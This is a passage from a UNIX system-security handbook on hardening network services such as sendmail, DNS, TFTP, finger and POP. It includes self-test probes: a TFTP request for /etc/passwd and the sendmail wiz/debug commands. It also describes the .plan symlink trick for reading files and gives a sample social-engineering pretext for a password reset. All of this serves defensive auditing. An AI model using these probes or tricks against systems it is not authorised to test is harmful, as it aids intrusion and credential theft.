Sometimes, you may wish to give people permission to FTP files to and from your computer, but you may not want to give them<br />

permission to actually log in. One simple way to accomplish this goal is to set up the person's account with a special shell, such as<br />

/bin/ftponly. Follow these directions:[11]

[11] If you are using wuftpd, note that there is a feature which allows a similar configuration.

1. Create a shell script /bin/ftponly, which prints a polite error message if the user attempts to log into his account. Here is an example:

#!/bin/sh
/bin/cat
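In full, such a script might look like the following sketch; the message wording, the sleep, and the exit status are illustrative choices:

#!/bin/sh
# ftponly: refuse interactive logins for FTP-only accounts.
/bin/cat << 'EOM'

This account may be used only for FTP file transfer;
interactive logins are not permitted. Please contact the
system administrator if you believe this is in error.

EOM
sleep 10      # give the user a moment to read the message
exit 1        # fail the login

Remember that on systems whose FTP server checks /etc/shells, the new shell must also be listed there, or the account will lose its FTP access as well.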



17.3.3 Telnet (TCP Port 23)

Compared with dial-up modem access, logging in over the network gives an attacker several advantages:

● Although finding the telephone number of a computer's modems can be difficult, one can easily find out the address of a computer on the Internet. Few computer centers publish the telephone numbers of their computer's modems, but a computer's Internet address can be easily determined from its hostname. Although this availability makes access easier for authorized users, it also makes access easier for attackers.

● Because connecting to a computer via Telnet is significantly faster than calling the computer with a modem, an attacker can try to guess more passwords in a given amount of time.

● As long distance calls cost the caller money, few attackers try to break into computers outside their local calling area. On the other hand, there is usually no incremental cost associated with using Telnet to break into distant machines. Somebody trying to log into your computer with a stolen password might be across the street, or they might be on the other side of the globe.

● Because the Internet lacks a sophisticated technology for tracing calls (often available on telephone networks), the Internet gives attackers the added protection of near anonymity.

● Many modems ring or produce other audible sounds when they receive incoming calls. Telnet connections are silent, and thus less likely to attract outside attention.

● A network connection allows an attacker to gain much more information about a target machine, which can be used to locate additional points of vulnerability.

Telnet is a useful service. To make it safer, you should avoid using reusable passwords. You can also assign users different<br />

passwords on different computers, so that if one account is compromised, others will not be.<br />

17.3.4 Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

The Simple Mail Transfer Protocol (SMTP) is an <strong>Internet</strong> standard for transferring electronic mail between computers. The <strong>UNIX</strong><br />

program /usr/lib/sendmail usually implements both the client side and the server side of the protocol, and seems to be the<br />

predominant software used in <strong>UNIX</strong> email systems. Using sendmail, mail can be:<br />

● Delivered to individual users

● Distributed to mailing lists (of many users)

● Sent automatically to another machine

● Appended to files

● Provided as standard input to programs

A legitimate mail address can be a username or an entry in the alias database. The aliases are located in the aliases file, usually in<br />

the /usr/lib, /etc, /etc/mail, or /etc/sendmail directories.<br />

The sendmail program also allows individual users to set up an alias for their accounts by placing a file with the name .forward in<br />

their home directories.<br />
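For example, an entry in the aliases file maps a name on the left-hand side to one or more recipients on the right, and a .forward file simply lists the addresses to which the user's mail should be sent; the names and hosts below are illustrative:

# Sample aliases file entries
postmaster: helen
staff: helen, marco, jian

# Sample contents of ~helen/.forward
helen@mailhub.example.org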

Another file, sendmail.cf, controls sendmail's configuration. The sendmail.cf file can also be found in various directories,<br />

depending on the version in use and the configuration options chosen.<br />

NOTE: The sendmail program is only one of many different systems for delivering email over the <strong>Internet</strong>. Others<br />

include smail, MMDF, and PMDF. However, Berkeley's sendmail is by far the most common mailer on the <strong>Internet</strong>.<br />

It also seems to be the mailer that is the most plagued with security problems. Whether these problems are because<br />

the design of sendmail is fundamentally flawed, because the coding of sendmail is particularly sloppy, or simply<br />

because more people are looking for flaws in sendmail than in any other program remains an open question.<br />

17.3.4.1 sendmail and security<br />

sendmail has been the source of numerous security breaches on <strong>UNIX</strong> systems. For example:<br />

● Early versions of sendmail allowed mail to be sent directly to any file on the system, including files like /etc/passwd.

● sendmail supports a "wizard's password," set in the configuration file, that can be used to get a shell on a remote system without logging in.

● sendmail allows trusted users, who are permitted to forge mail that is delivered to the local machine.

● sendmail can be compiled in "debug mode," a mode that in the past has been used to allow outsiders unrestricted access to the system sendmail is running on.

● sendmail used to accept mail with a program as the recipient, thus allowing remote users to invoke shells and other programs on the destination host.

● sendmail has done a poor job of validating its arguments, thus allowing users to overwrite arbitrary locations in memory, or provide input that results in very bad side effects.

One of the main reasons for sendmail's problems is its all-in-one design. The program is extremely complicated, runs as superuser,<br />

freely accepts connections from any computer on the <strong>Internet</strong>, and has a rich command language. We are not surprised that the<br />

program has been plagued with problems, although it seems to have had more than its share.<br />

Fortunately, there are alternatives. Instead of having a large all-in-one program receive messages from the <strong>Internet</strong> and then<br />

deliver the mail, you could split this functionality into two different programs. The Firewall Toolkit from Trusted Information<br />

Systems contains a program called smap that does exactly this. Even if you do not have a firewall, you may wish to use smap for<br />

accepting SMTP connections from outside sites. For instructions on how to do this, see "Installing the TIS smap/smapd sendmail<br />

Wrapper" in Chapter 22.<br />

What's My sendmail Version?<br />

If you are using the version of sendmail that was supplied with your operating system, then you may have difficulty figuring out<br />

which version of sendmail you are actually running. Your sendmail program should print its version number when you telnet to it<br />

(port 25). Beware: if sendmail does not print a version number, there is no easy way to determine what version number you have.<br />
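For example, a banner check might look something like the following; the hostname, version string, and timestamp shown here are made up, and your server's greeting will differ:

% telnet mailhost.bigcorp.com smtp
Trying...
Connected to mailhost.bigcorp.com.
Escape character is '^]'.
220 mailhost.bigcorp.com Sendmail 8.7.5/8.7.3 ready at Tue, 2 Apr 1996 10:15:03 -0500
quit
221 mailhost.bigcorp.com closing connection
Connection closed by foreign host.
%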

One way that you can be certain of your sendmail version is to download and install a new version yourself.

You can get the current version of sendmail from the following locations:<br />

ftp://ftp.cs.berkeley.edu/ucb/sendmail<br />

ftp://info.cert.org/pub/tools/sendmail/<br />

ftp://auscert.org.au/pub/mirrors/ftp.cs.berkeley.edu/ucb/sendmail<br />

Some vendors make proprietary changes to the sendmail program, so you may not be able to use Berkeley's unmodified version on<br />

your system. (For example, Berkeley's unmodified sendmail will not read mail aliases from systems using Sun Microsystems'

NIS+ network name service.) In these cases, your only solution is to speak with your vendor.<br />

17.3.4.2 Using sendmail to receive email<br />

If you must run sendmail to receive electronic mail, you should take extra measures to protect your system's security.<br />

1. Make sure that your sendmail program does not support the debug, wiz, or kill commands. You can test your sendmail with the following command sequence:

% telnet localhost smtp
Connected to localhost.
Escape character is "^]".
220 prose.cambridge.ma.us Sendmail 5.52 ready at Mon, 2 Jul 90 15:57:29 EDT
wiz
500 Command unrecognized
debug
500 Command unrecognized
kill
500 Command unrecognized
quit
221 prose.cambridge.ma.us closing connection
Connection closed by foreign host
%

The command telnet localhost smtp opens up a TCP connection between your terminal and the SMTP port of your local computer (which always has the alias localhost). You are then able to type commands to your sendmail's command interpreter. If your sendmail responds to the debug or wiz command with any of the following messages - or any message other than "command unrecognized" - replace the version of sendmail that you are running (but see #4 below):

200 Debug set<br />

200 Mother is dead<br />

500 Can't kill Mom<br />

200 Please pass, oh mighty wizard<br />

500 You are no wizard!<br />

2. Delete the "decode" alias from the alias file. The decode alias is a single line that looks like this:
decode: "|/usr/bin/uudecode"
The decode alias allows mail to be sent directly to the uudecode program. This ability has been shown to be a security hole. Examine carefully every alias that points to a file or program instead of a user account. Remember to run newaliases after changing the aliases file.

3. Make sure that your aliases file is protected so that it cannot be modified by people who are not system administrators. Otherwise, people might add new aliases that run programs, redirect email for system administrators, or play other games. If your version of sendmail creates aliases.dir and aliases.pag dbm files, those files should also be protected.

Make sure that the "wizard" password is disabled in the sendmail.cf file. If it is not, then a person who knows the wizard<br />

password can connect to your computer's sendmail daemon and start up a shell without logging in! If this feature is enabled<br />

in your version of sendmail, you will note that the wizard password is a line that begins with the letters OW (uppercase O,<br />

uppercase W). For example:<br />

# Let the wizard do what she wants<br />

OWsitrVlWxktZ67<br />

If you find a line like this, change it to disallow the wizard password:<br />

# Disallow wizard password:<br />

OW*<br />

5. Make sure that you have the most recent version of sendmail installed on your computer. Monitor the CERT mailing list for problems with sendmail and be prepared to upgrade as soon as vulnerabilities are posted.

Stamp Out Phantom Mail!<br />

The <strong>UNIX</strong> operating system uses accounts without corresponding real users to perform many system functions. Examples of these<br />

accounts include uucp, news, and root. Unfortunately, the mail system will happily receive email for these users.<br />

Email delivered to one of these accounts normally goes only to a mail file. There, it resides in your /var/spool/mail directory until<br />

it is finally read. On some systems, there is mail waiting for users with the names news or ingres that is more than five years old.<br />

Is this a problem? Absolutely:<br />

● These mail files can grow to be megabytes long, consuming valuable system resources.
● Many programs that run autonomously will send mail to an address such as news or uucp when they encounter a problem. If this mail is not monitored by the system administrator, problems can go undiagnosed.

You can avoid the problem of phantom mail by creating mail aliases for all of your system (nonuser) accounts. To make things easy for future system administrators, you should put these aliases at the beginning of your aliases file. For example:

#<br />

# System aliases<br />

#<br />


root: simsong<br />

Postmaster: root<br />

usenet: root<br />

news: root<br />

agent: root<br />

sybase: root<br />

MAILER-DAEMON: postmaster<br />

NOTE: When security flaws are announced, potential intruders are often much quicker to attack than system<br />

administrators are to upgrade. We advise you to upgrade as quickly as possible. Sites have been attacked within six<br />

hours of the release of a CERT advisory.<br />

17.3.4.3 Improving the security of Berkeley sendmail V8<br />

If you are intent on using Berkeley sendmail for your mail server, you can still improve your security by using sendmail Version<br />

8. If you are not running sendmail Version 8, then you are probably running Version 5; Versions 6 and 7 did not make it out the<br />

door.<br />

NOTE: Be sure that you track the current version of sendmail, and obtain new versions as necessary. New<br />

security-related bugs are (seemingly) constantly being discovered in sendmail. If you do not keep up, your site may<br />

be compromised!<br />

There are well-known vulnerabilities, with exploit scripts, in most older versions of sendmail, including versions provided by<br />

many vendors. Besides containing numerous bug fixes over previous versions of sendmail, Version 8 offers a variety of "security<br />

options" that can be enabled by inserting a statement in your sendmail.cf configuration file. Many of these options are designed to<br />

control the release of information about your internal organization on the <strong>Internet</strong>.[13] These options are summarized in Table<br />

17.1:<br />

[13] We recommend that you read the security chapter in Sendmail by Bryan Costales et al. (<strong>O'Reilly</strong> & Associates,<br />

1993) for additional information.<br />

Table 17.1: <strong>Sec</strong>urity Options in Version 8 Sendmail<br />

Option          Effect                                  Purpose
novrfy          Disables VRFY command.                  VRFY can be used by outsiders to determine the names of valid users; use novrfy to disable this command.
noexpn          Disables EXPN command.                  EXPN reveals the actual delivery addresses of mail aliases and mailing lists; noexpn disables this command.
needmailhelo    Requires HELO before a MAIL command.    Refuses mail unless the sending site has properly identified itself.
needvrfyhelo    Requires HELO before VRFY command.      Allows the use of the VRFY command, but only after the network user has identified himself.
needexpnhelo    Requires HELO before EXPN command.      Allows use of the EXPN command, but only after the network user has identified himself.
restrictmailq   Restricts use of mailq command.         If set, allows only users who belong to the group that owns the mail queue directory to view the mail queue. This restriction can prevent others from monitoring mail that is exchanged between your computer and the outside world.

You can increase the logging level of sendmail to level 9 by inserting the line "OL9" in your sendmail.cf file, and we recommend<br />

that you do so; higher levels are used for debugging and do not serve any obvious security purpose. This will log lots of<br />

interesting information to syslog. Be sure that your syslog.conf file is configured so that this information is written to a reasonable<br />

place, and be sure to check the logs.<br />
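The two pieces of that recommendation might look like the following sketch; the log file path is an assumption, so use whatever destination your site actually monitors:

# In sendmail.cf: raise sendmail's logging level to 9
OL9

# In /etc/syslog.conf: write mail-related messages to a log file
# (fields are tab-separated; the destination shown is only an example)
mail.info	/var/log/syslog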

There have been a number of problems with addresses that send mail to programs. This should be disabled, if not needed, by<br />

setting the progmailer to a program such as /bin/false. If you do need progmailer functionality, use smrsh (bundled with 8.7.x).<br />
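One common way to do this in Version 8 is to point the prog mailer's program at smrsh (or at /bin/false to disable program delivery outright) rather than at /bin/sh. The mailer flags and paths below are only a sketch, not a drop-in configuration; check the documentation for your sendmail version before making the change:

# Original prog mailer definition (typical form):
#   Mprog, P=/bin/sh, F=lsDFMeu, S=10, R=20, A=sh -c $u
# Modified so that the prog mailer runs smrsh, which executes only approved programs:
Mprog, P=/usr/local/etc/smrsh, F=lsDFMeu, S=10, R=20, A=sh -c $u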

Here is an example of when you might use the security options. Suppose that you have a company-wide alias such as all or<br />

marketing, and that you wish to prevent outsiders (such as recruiters) from learning the email addresses of people on these mailing<br />


lists. At the same time, you may wish to prevent outsiders from learning the names of valid accounts on your system, to avoid<br />

accepting email from sites that do not properly identify themselves, and to prevent employees from spying on another's email<br />

correspondence. In this case, you would insert the following line into your sendmail.cf file; note that the "O" is required at the<br />

beginning of the Option line.<br />

Onovrfy,noexpn,needmailhelo,restrictmailq<br />

We recommend that you use this setting unless you have a specific reason for divulging your internal account information to the<br />

Internet at large. Be aware, though, that sendmail's VERB (verbose) command will still be active and may be used by attackers to gain insight into your vulnerabilities. The VERB command cannot be easily disabled.

Note that if you disable the finger command and also disable the VRFY command in your mailer, you can make it difficult for someone outside your site to determine a valid email address for a user who may be at your site. You should probably set up some form of modified finger service in this case to respond with information about how to obtain a valid email address.

17.3.5 TACACS (UDP Port 49)<br />

TACACS is the TAC Access Control Server protocol, used to authenticate logins to terminal servers.

TACACS defines a set of packet types that can be sent from the terminal server to an authentication server. The LOGIN packet is<br />

a query indicating that a user wishes to log in to the terminal server. The TACACS server examines the username and the<br />

password that are present in the LOGIN packet and sends back an ANSWER packet that either accepts the login or rejects it.<br />

The TACACS and XTACACS (Extended TACACS) protocols support a variety of additional packet types, which allow the terminal server to notify the host when users connect, hang up, log in, log out, and switch into SLIP mode.

Passwords are not encrypted with TACACS. Thus, they are susceptible to packet sniffing.<br />

17.3.6 Domain Name System (DNS) (TCP and UDP Port 53)<br />

The Domain Name System (DNS) is a distributed database that is used so that computers may determine IP addresses from<br />

hostnames, determine where to deliver mail within an organization, and determine a hostname from an IP address. The process of<br />

using this distributed system is called resolving.<br />

When DNS looks up a hostname (or other information), the computer performing the lookup contacts one or more nameservers,<br />

seeking records that match the hostname that is currently being resolved.[14] One or more nameserver records can be returned in<br />

response to a name lookup. Table 17.2 lists some of the kinds of records that are supported:<br />

[14] Most <strong>UNIX</strong> DNS implementations use a file called /etc/resolv.conf to specify the IP addresses of the<br />

nameservers that should be queried. Further, a default domain can be specified.<br />

Table 17.2: DNS-supported Record Types<br />

Record Type   Purpose
A             Authoritative address. For the IN domain, this is an IP address.
AAAA          IP version 6 authoritative address.
CNAME         Canonical name of an alias for a host.
PTR           Pointer record; maps IP addresses to a hostname (for IP host).
MX            Mail exchange; specifies a different computer that should actually receive mail destined for this host.

For example, using DNS, a computer on the <strong>Internet</strong> might look up the name www.cs.purdue.edu and receive an A record<br />

indicating that the computer's IP address is 128.10.19.20. An MX query about the address cs.purdue.edu might return a record<br />

indicating that mail for that address should actually be delivered to the machine arthur.cs.purdue.edu. You can have multiple MX<br />

records for robustness; if the first host is unavailable, the program attempting to deliver your electronic mail will try the second,<br />

and then the third. Of course, a program trying to deliver email would then have to resolve each of the MX hostnames to<br />

determine that computer's IP address.<br />
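You can watch these lookups by hand with a resolver tool such as nslookup. The output below is abbreviated, and the answers shown (other than the record types involved) are purely illustrative:

% nslookup -type=MX cs.purdue.edu
cs.purdue.edu   preference = 1, mail exchanger = arthur.cs.purdue.edu
% nslookup -type=A arthur.cs.purdue.edu
Name:    arthur.cs.purdue.edu
Address: 128.10.2.1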

DNS also makes provision for mapping IP addresses back to hostnames. This reverse translation is accomplished with a special<br />

domain called IN-ADDR.ARPA, which is populated exclusively by PTR records. In this example, attempting to resolve the<br />

address 20.19.10.128.IN-ADDR.ARPA would return a PTR record pointing to the hostname, which is lucan.cs.purdue.edu (the


CNAME of www.cs.purdue.edu).<br />

Besides individual hostname resolutions, DNS also provides a system for downloading a copy of the entire database from a<br />

nameserver. This process is called a zone transfer, and it is the process that secondary servers use to obtain a copy of the primary<br />

server's database.<br />

DNS communicates over both UDP and TCP, using the different protocols for different purposes. Because UDP is a quick,<br />

packet-based protocol that allows for limited data transfer, it is used for the actual process of hostname resolution. TCP,<br />

meanwhile, is used for transactions that require large, reliable, and sustained data transfer - that is, zone transfers.<br />

17.3.6.1 DNS zone transfers<br />

Zone transfers can be a security risk, as they potentially give outsiders a complete list of all of an organization's computers<br />

connected to the internal network. Many sites choose to allow UDP DNS packets through their firewalls and routers, but explicitly<br />

block DNS zone transfers originating at external sites. This design is a compromise between safety and usability: it allows<br />

outsiders to determine the IP addresses of each internal computer, but only if the computer's name is already known.<br />

You can block zone transfers with a router that can screen packets, by blocking incoming TCP connections on port 53. Some versions of the Berkeley named nameserver allow you to place an xfrnets directive in the /etc/named.boot file. If this option is specified, zone transfers will only be permitted from the hosts listed on the xfrnets line. This option is useful if you wish to allow zone transfers to a secondary nameserver that is not within your organization, but you don't want to allow zone transfers to anyone else.

For example, if your site operates a single domain, bigcorp.com, and you have a secondary nameserver at IP address<br />

204.17.199.40, you might have the following /etc/named.boot file:<br />

; BigCorp's /etc/named.boot<br />

;<br />

directory /var/named<br />

;<br />

primary bigcorp.com named.bigcorp<br />

primary 199.17.204.in-addr.arpa named.204.17.199<br />

cache . root.ca<br />

xfrnets 204.17.199.40<br />

17.3.6.2 DNS nameserver attacks<br />

Because many <strong>UNIX</strong> applications use hostnames as the basis of access control lists, an attacker who can gain control of your DNS<br />

nameserver or corrupt its contents can use that to break into your systems.<br />

There are two fundamental ways that an attacker can cause a nameserver to serve incorrect information:<br />

1. Incorrect information can be fraudulently loaded into your nameserver's cache over the network, as a false reply to a query.
2. An attacker can change the nameserver's configuration files on the computer where your nameserver resides.

If your nameserver has contact with the outside network, there is a possibility that attackers can exploit a programming bug or a<br />

configuration error to load your nameserver with erroneous information. The best way to protect your nameserver from these<br />

kinds of attacks is to isolate it from the outside network, so that no contact is made. If you have a firewall, you can achieve this<br />

isolation by running two nameservers: one in front of the firewall, and one behind it. The nameserver in front of the firewall<br />

contains only the names and IP addresses of your gate computer; the nameserver behind the firewall contains the names and IP<br />

addresses of all of your internal hosts. If you couple these nameservers with static routing tables, damaging information will not<br />

likely find its way into your nameservers.<br />

To change your configuration files, an attacker must have access to the filesystem of the computer on which the nameserver is<br />

running and be able to modify the files. After the files are modified, the nameserver must be restarted (by sending it a kill -HUP<br />

signal). As the nameserver must run as superuser, an attacker would need to have superuser access on the server machine to carry<br />

out this attack. Unfortunately, by having control of your nameserver, a skillful attacker could use control over the nameserver to<br />

parlay control of a single machine into control of your entire network. Furthermore, if the attacker does not have root but can<br />

modify the nameserver files, then he can simply wait until the nameserver is restarted by somebody else, or until the system<br />

crashes and every program is restarted.<br />


You can minimize the possibility of an attacker modifying your nameserver by following these recommendations:<br />

● Run your nameserver on a special computer that does not have user accounts.
● If you must run the nameserver on a computer that is used by ordinary users, make sure that the nameserver's files are all owned by root and have their protection mode set to 444 or 400 (depending on your site's policy). Any directories that are used to store nameserver files should be owned by root and have their protection mode set to 755 or 700 (again, depending on your site's policy). And all parent directories of those directories should be owned by root, mode 755 or 700. (Sample commands appear after this list.)
● Remember, there are many files that are used by the nameserver. For example, the Berkeley named nameserver (by far the most common on UNIX systems) first looks at the file /etc/named.boot when it starts up. This file specifies other files and other directories that may be located anywhere on your computer. Be sure that all of these files are properly protected.
● If you know of a specific site that is attempting to attack your nameserver, you can use BIND's bogusns directive to prevent the program from sending nameserver queries to that host.
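As a concrete sketch of the file-protection recommendation above, the commands below assume that your named.boot file points at a /var/named directory and that your site has chosen modes 444 and 755; substitute your own paths and policy, and run the commands as the superuser (the # is the root prompt):

# chown root /etc/named.boot /var/named /var/named/*
# chmod 444 /etc/named.boot /var/named/*
# chmod 755 /var/named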

You can further protect yourself from nameserver attacks by using IP addresses in your access control lists, rather than by using<br />

hostnames. Unfortunately, several significant programs do not allow the use of IP addresses. For example, the Solaris rlogind/rshd<br />

does not allow you to specify an IP address in the /etc/hosts.equiv file or the .rhosts file. We believe that vendors should modify<br />

their software to permit an IP address to be specified wherever hostnames are currently allowed.<br />

17.3.7 Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

The Trivial File Transfer Protocol (TFTP) is a UDP-based file-transfer program that provides no security. There is a set of files<br />

that the TFTP program is allowed to transmit from your computer, and the program will transmit them to anybody on the <strong>Internet</strong><br />

who asks for them. One of the main uses of TFTP is to allow workstations to boot over the network; the TFTP protocol is simple<br />

enough to be programmed into a small read-only memory chip.<br />

Because TFTP has no security, tftpd, the TFTP daemon, is normally restricted so that it can transfer files only to or from a certain<br />

directory. Unfortunately, many early versions of tftpd had no such restriction. For example, versions of the SunOS operating<br />

systems prior to Release 4.0 did not restrict file transfer from the TFTP program.<br />
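On many systems, the restriction is imposed by starting tftpd with a flag (often -s) that confines it to a single directory such as /tftpboot. The inetd.conf entry below is a hypothetical example; the daemon's path, name, and flags vary from vendor to vendor:

tftp    dgram   udp     wait    root    /usr/etc/in.tftpd    in.tftpd -s /tftpboot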

You can test your version of tftpd for this restriction with the following sequence:<br />

% tftp localhost<br />

tftp> get /etc/passwd tmp<br />

Error code 1: File not found<br />

tftp> quit<br />

%<br />

If tftp does not respond with "Error code 1: File not found," or simply hangs with no message, then get a current version of the<br />

program.<br />

On AIX, tftp access can be restricted through the use of the /etc/tftpaccess.ctl file.<br />

17.3.8 finger (TCP Port 79)<br />

The finger program has two uses:<br />

● If you run finger with no arguments, the program prints the username, full name, location, login time, and office telephone number of every user currently logged into your system (assuming that this information is stored in the /etc/passwd file).
● If you run finger with a name argument, the program searches through the /etc/passwd file and prints detailed information for every user with a first name, last name, or username that matches the name you specified.

Normally, finger runs on the local machine. However, you can find out who is logged onto a remote machine (in this case, a<br />

machine at MIT) by typing:<br />

% finger @media-lab.media.mit.edu<br />

To look up a specific user's finger entry on this machine, you might type:<br />

% finger gandalf@media-lab.media.mit.edu<br />


The /etc/fingerd program implements the network finger protocol, which makes finger service available to anybody on the<br />

network.<br />

finger provides a simple, easy-to-use system for making personal information (like telephone numbers) available to other people.<br />

Novice users are often surprised, however, that information that is available on their local machine is also available to anyone on<br />

any network to which their local machine is connected. Thus, users should be cautioned to think twice about the information they<br />

store using the chfn command, and in their files printed by finger. finger makes it easy for intruders to get a list of the users on<br />

your system, which dramatically increases the intruders' chances of breaking into your system.<br />

17.3.8.1 The .plan and .project files<br />

Most versions of the <strong>UNIX</strong> finger program display the contents of the .plan and .project files in a person's home directory when<br />

that person is "fingered." On older versions of <strong>UNIX</strong>, the finger daemon ran as root. As a result, an intrepid user could read the<br />

contents of any file on the system by making her .plan a symbolic link to that file, and then running finger against her own<br />

account.<br />

One easy way that you can check for this is to create a .plan file and change its file mode to 000. Then run finger against your own account. If you see the contents of your .plan file, then your version of fingerd is insecure.
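A minimal version of this test looks like the following; replace yourname with your own account name:

% echo "test line" > $HOME/.plan
% chmod 000 $HOME/.plan
% finger yourname

If the finger output includes "test line" even though the file is unreadable by you, the daemon is reading users' files with root privileges and should be replaced.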

17.3.8.2 Disabling finger<br />

The finger system reveals information that could be used as the basis for a social engineering attack. For example, an attacker<br />

could "finger" a user on the system, determine their name and office number, then call up the system operator and say "Hi, this is<br />

Jack Smith. I work in office E15, but I'm at home today. I've forgotten my password; could you please change my password to<br />

foo*bar so that I can log on?"<br />

Many system administrators choose to disable the finger system. There are two ways that you can do this:<br />

● You can remove (or comment out) the finger server line in the file /etc/inetd.conf. (A sample inetd.conf entry is shown after this list.) This change will cause people trying to finger your site to receive a "Connection refused" error. Disabling finger in this way can cause problems for people trying to determine mail addresses or phone numbers. Outsiders may be attempting to contact you to warn you that your site has been broken into by others. Therefore, completely disabling finger in this way might actually decrease your overall security, in addition to causing an overall inconvenience for everybody.
● You can replace the finger server with a shell script that prints a message instructing people how to contact your site. For example, you might use a script that looks like this:
#!/bin/sh
#
/bin/cat << 'EOF'
[a short message telling people how to reach your site, such as a postmaster address or phone number]
EOF
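If you take the first approach, the change is a one-line edit to /etc/inetd.conf followed by sending inetd a HUP signal so that it rereads the file. The entry below is only a typical example; the daemon's path and the fields on your system may differ:

#finger stream  tcp     nowait  nobody  /usr/etc/in.fingerd  in.fingerd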



A more flexible alternative is to run a configurable directory server such as ph, which lets you control the information that is published and specify which information should be returned for queries originating from inside and outside your network.

You can download the ph server from ftp://vixen.cso.uiuc.edu/pub/ph.tar.gz.<br />

17.3.9 HyperText Transfer Protocol (HTTP) (TCP Port 80)<br />

The Hypertext Transfer Protocol is the protocol that is used to request and receive documents from servers on the World Wide<br />

Web (WWW). Access to the World Wide Web is one of the driving forces behind the growth of the <strong>Internet</strong>, and many sites that<br />

have <strong>Internet</strong> connectivity will be pressured to provide both client applications and WWW servers for their users.<br />

One of the reasons for the success of HTTP is its simplicity. When a client contacts a WWW server, the client asks for a filename;<br />

the server responds with a MIME document formatted in either plain ASCII or HTML (HyperText Markup Language). The<br />

document is then displayed.[15]<br />

[15] HTML is a simple use of SGML (Standard Generalized Markup Language).<br />

WWW browsers can implement as much (or as little) of HTML as they wish; the documents displayed will still be viewable.<br />

HTML documents can have embedded tags for images (which are separately retrieved) and for hypertext links to other documents.<br />

The servers are configured so that a specified directory on the system (for example, /usr/local/etc/httpd/htdocs) corresponds with<br />

the root directory of the WWW client (for example, http://www.oreilly.com/).<br />

Because there are many security considerations when setting up a WWW server and using a WWW client, we have written a<br />

whole chapter about them. See Chapter 18, WWW <strong>Sec</strong>urity, for the complete story.<br />

17.3.10 Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

The Post Office Protocol (POP) is a system that provides users on client machines a way to retrieve their electronic mail - without<br />

mounting a shared mail-spool directory using a remote file-access protocol such as NFS. POP allows users to access individual<br />

mail messages, to set limits on the maximum length of the message that the client wishes to retrieve, and to leave mail on the<br />

server until the message has been explicitly deleted.<br />

POP requires that users authenticate themselves before they can access their mail. There are at least three ways to do this:<br />

1. You can use simple passwords. This is by far the most common way for POP users to authenticate themselves to POP servers. Unfortunately, most POP clients use the same password for retrieving mail that they do for unrestricted system access. As a result, the user's password is a tempting target for an attacker armed with a packet sniffer. And it's an easy target, as it is always sent properly, it is always sent to the same port, and it is sent frequently - typically every few minutes.

2. You can use POP's APOP option. Instead of passwords, APOP uses a simple challenge/response system. It is described in RFC 1725, the same RFC that describes POP3.

When a client program connects to a POP3 server, the server sends a banner that must include a unique timestamp string<br />

located within a pair of angle-brackets. For example, the <strong>UNIX</strong> POP server might return the following:<br />

+OK POP3 server ready <1896.697170952@dbc.mtview.ca.us>

When using simple passwords, the client program would next send through the username and the password, like this:<br />

+OK POP3 server ready <1896.697170952@dbc.mtview.ca.us>

user mrose<br />

+OK Password required for mrose.<br />

pass fooby$#<br />

+OK maildrop has 1 message (369 octets)<br />

With APOP, the client program does not send the USER and PASS commands; instead, it sends an APOP command that<br />

contains the username and a 128-bit hexadecimal number that is the MD5 hash code of the timestamp (including the angle<br />

brackets) and a secret passphrase that is known to both the user and the POP server. For example, the user might have the<br />

password tanstaaf. To determine the appropriate MD5 code, the user's client program would compute the MD5 hash of:<br />

<1896.697170952@dbc.mtview.ca.us>tanstaaf

which is:<br />

c4c9334bac560ecc979e58001b3e22fb<br />


Thus, the APOP message sent to the server would be:<br />

APOP mrose c4c9334bac560ecc979e58001b3e22fb<br />

+OK maildrop has 1 message (369 octets)<br />

Note that because the POP3 server must know the shared secret, it should not be the same phrase as your password.<br />

3. You can use a version of POP that has been modified to work with Kerberos. (Kerberos is described in Chapter 19, RPC, NIS, NIS+, and Kerberos.)
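If you want to verify the digest used in the APOP example above, you can compute it from the command line. The md5 program below stands for whatever MD5 message-digest utility your system provides (it may be called md5 or md5sum, and output formats vary slightly), and echo -n suppresses the trailing newline; both are assumptions to check on your own system:

% echo -n '<1896.697170952@dbc.mtview.ca.us>tanstaaf' | md5
c4c9334bac560ecc979e58001b3e22fb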

Note that both your POP server and your POP client must support the authentication system that you wish to use. For example, early versions of the popular Eudora email client supported only traditional passwords, but later versions include support for both APOP and Kerberos.[16]

[16] Actually, Eudora doesn't support Kerberos directly. Instead, it uses the Kclient application program that is<br />

available for both the Macintosh and Windows.<br />

17.3.11 Sun RPC's portmapper (UDP and TCP Port 111)

The portmapper program is used as part of Sun Microsystems' Remote Procedure Call (RPC) system to dynamically assign the

TCP and UDP ports used for remote procedure calls. portmapper is thus similar to the inetd daemon, in that it mediates<br />

communications between network clients and network servers that may have security problems.<br />

The standard <strong>UNIX</strong> portmapper assumes that security will be handled by the servers, and therefore allows any network client to<br />

communicate with any RPC server. You can improve security by using Wietse Venema's portmapper replacement program, which<br />

can be obtained via anonymous FTP from the site ftp.win.tue.nl, in the file /pub/security/portmap.shar. This portmapper allows for improved

logging, as well as access control lists.<br />

Many sites further restrict access to their portmappers by setting their firewalls to block packets on port 111.<br />

17.3.12 Identification Protocol (auth) (TCP Port 113)<br />

The TCP/IP protocol is a system for creating communication channels between computers, not users. However, it is sometimes<br />

useful to know the name of the user associated with a particular TCP/IP connection. For example, when somebody sends mail to<br />

your computer, you should be able to verify that the username in the mail message's "From:" field is actually the name of the user<br />

who is sending the message.<br />

The identification protocol gives you a way of addressing this problem with a simple callback scheme. When a server wants to<br />

know the "real name" of a person initiating a TCP/IP connection, it simply opens a connection to the client machine's identd<br />

daemon and sends a description of the TCP/IP connection in progress; the remote machine sends a human-readable representation<br />

of the user who is initiating the connection - usually the user's username and the full name from the /etc/passwd file.<br />

The identification protocol is usually not a very good approach to network security, because it depends on the honesty of the<br />

computer at the other end of the TCP/IP connection. Thus, if somebody is trying to break into your computer from another<br />

computer that they have already gained control of, ident will not tell you that person's name. On the other hand, it is useful for<br />

organizations such as universities who want to track down the perpetrators of simplistic, sophomoric email forgery attempts.<br />

If an intruder has a normal account (no root privileges) that he is using as a stepping stone to other hosts, running an ident server<br />

may be very useful in tracking down the intruder. Sites that have a reasonable number of users should run ident to help track down<br />

accounts that have been compromised during an incident.<br />

In general, the responses to ident queries are more useful to the administrators of the site that sends the response than to the site that receives it. Thus, logging ident queries may not help you, but it can be a courtesy to others.

To make use of the identification protocol, you need to have a server program that understands the protocol and knows to place<br />

the callback. sendmail version 8 will do so, for instance, as will tcpwrapper.<br />


17.3.13 Network News Transport Protocol (NNTP) (TCP Port 119)<br />

